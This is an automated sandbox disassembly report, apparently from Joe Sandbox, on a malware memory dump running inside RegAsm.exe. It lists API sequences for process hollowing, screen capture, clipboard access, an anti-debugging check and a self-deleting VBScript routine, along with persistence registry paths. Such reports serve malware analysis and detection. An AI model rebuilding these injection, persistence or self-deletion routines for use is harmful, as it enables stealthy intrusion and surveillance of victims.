                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                        • String ID: sJD
                                                        • API String ID: 1661935332-3536923933
                                                        • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                        • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                                        • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                        • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                                        • String ID:
                                                        • API String ID: 2829624132-0
                                                        • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                        • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                                        • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                        • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                        • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                                        • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                        • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$CloseDataOpen
                                                        • String ID:
                                                        • API String ID: 2058664381-0
                                                        • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                        • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                                        • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                        • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .
                                                        • API String ID: 0-248832578
                                                        • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                        • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                                        • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                        • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                        • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                        • String ID: lJD
                                                        • API String ID: 1084509184-3316369744
                                                        • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                        • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                                        • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                        • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                        • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                        • String ID: lJD
                                                        • API String ID: 1084509184-3316369744
                                                        • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                        • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                                        • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                        • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID: GetLocaleInfoEx
                                                        • API String ID: 2299586839-2904428671
                                                        • Opcode ID: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                                        • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                                        • Opcode Fuzzy Hash: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                                        • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                        • HeapFree.KERNEL32(00000000), ref: 004120EE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$FreeProcess
                                                        • String ID:
                                                        • API String ID: 3859560861-0
                                                        • Opcode ID: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
                                                        • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                                        • Opcode Fuzzy Hash: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
                                                        • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FeaturePresentProcessor
                                                        • String ID:
                                                        • API String ID: 2325560087-0
                                                        • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                        • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                                        • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                        • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                        • String ID:
                                                        • API String ID: 1663032902-0
                                                        • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                        • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                                        • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                        • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                        • String ID:
                                                        • API String ID: 2692324296-0
                                                        • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                        • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                                        • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                        • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                                        • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                        • String ID:
                                                        • API String ID: 1272433827-0
                                                        • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                        • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                                        • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                        • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                        • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                        • String ID:
                                                        • API String ID: 1084509184-0
                                                        • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                        • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                                        • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                        • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID:
                                                        • API String ID: 2299586839-0
                                                        • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                        • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                        • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                        • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                                          • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                                        • DeleteDC.GDI32(00000000), ref: 00418F2A
                                                        • DeleteDC.GDI32(00000000), ref: 00418F2D
                                                        • DeleteObject.GDI32(00000000), ref: 00418F30
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                                        • DeleteDC.GDI32(00000000), ref: 00418F62
                                                        • DeleteDC.GDI32(00000000), ref: 00418F65
                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                                        • GetIconInfo.USER32 ref: 00418FBD
                                                        • DeleteObject.GDI32(?), ref: 00418FEC
                                                        • DeleteObject.GDI32(?), ref: 00418FF9
                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                                        • DeleteDC.GDI32(?), ref: 0041917C
                                                        • DeleteDC.GDI32(00000000), ref: 0041917F
                                                        • DeleteObject.GDI32(00000000), ref: 00419182
                                                        • GlobalFree.KERNEL32(?), ref: 0041918D
                                                        • DeleteObject.GDI32(00000000), ref: 00419241
                                                        • GlobalFree.KERNEL32(?), ref: 00419248
                                                        • DeleteDC.GDI32(?), ref: 00419258
                                                        • DeleteDC.GDI32(00000000), ref: 00419263
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                        • String ID: DISPLAY
                                                        • API String ID: 479521175-865373369
                                                        • Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                                        • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                                        • Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                                        • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                        • ResumeThread.KERNEL32(?), ref: 00418435
                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                        • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                        • GetLastError.KERNEL32 ref: 0041847A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                        • API String ID: 4188446516-3035715614
                                                        • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                        • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                        • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                        • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                        • ExitProcess.KERNEL32 ref: 0040D7D0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                        • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                        • API String ID: 1861856835-332907002
                                                        • Opcode ID: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
                                                        • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                        • Opcode Fuzzy Hash: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
                                                        • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
